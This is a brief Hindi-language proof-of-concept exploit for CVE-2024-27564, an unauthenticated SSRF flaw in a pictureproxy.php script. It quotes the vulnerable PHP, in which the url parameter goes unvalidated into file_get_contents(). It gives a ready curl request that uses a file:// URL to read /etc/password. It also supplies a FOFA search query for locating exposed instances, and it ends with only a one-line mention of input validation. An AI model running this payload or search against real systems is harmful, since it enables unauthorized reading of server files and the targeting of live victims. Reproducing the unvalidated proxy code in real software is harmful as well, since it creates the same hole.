
CVE-2024-27564 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, pictureproxy.php में एक सर्वर-साइड अनुरोध जालसाजी (SSRF) भेद्यता जो बिना प्रमाणीकरण के दूरस्थ हमलावरों को url पैरामीटर के माध्यम से मनमाना URL इंजेक्ट करने की अनुमति देती है।
pictureproxy.php में एक भेद्यता दूरस्थ हमलावरों को url पैरामीटर में URL इंजेक्ट करके मनमाना अनुरोध करने की अनुमति देती है। यह SSRF भेद्यता बिना प्रमाणीकरण के शोषित की जा सकती है, जो इसे विशेष रूप से खतरनाक बनाती है।
भेद्य कोड pictureproxy.php फ़ाइल में है। समस्या इसलिए उत्पन्न होती है क्योंकि फ़ंक्शन url पैरामीटर को ठीक से मान्य नहीं करता है। $_GET['url'] वेरिएबल को file_get_contents() फ़ंक्शन में पास किया जाता है, जो निर्दिष्ट URL से सामग्री प्राप्त करता है। यह SSRF की ओर ले जा सकता है।
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Curl अनुरोध:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
FOFA= "title="ChatGPT个人专用版""
इनपुट सत्यापन का उचित प्रबंधन आवश्यक है।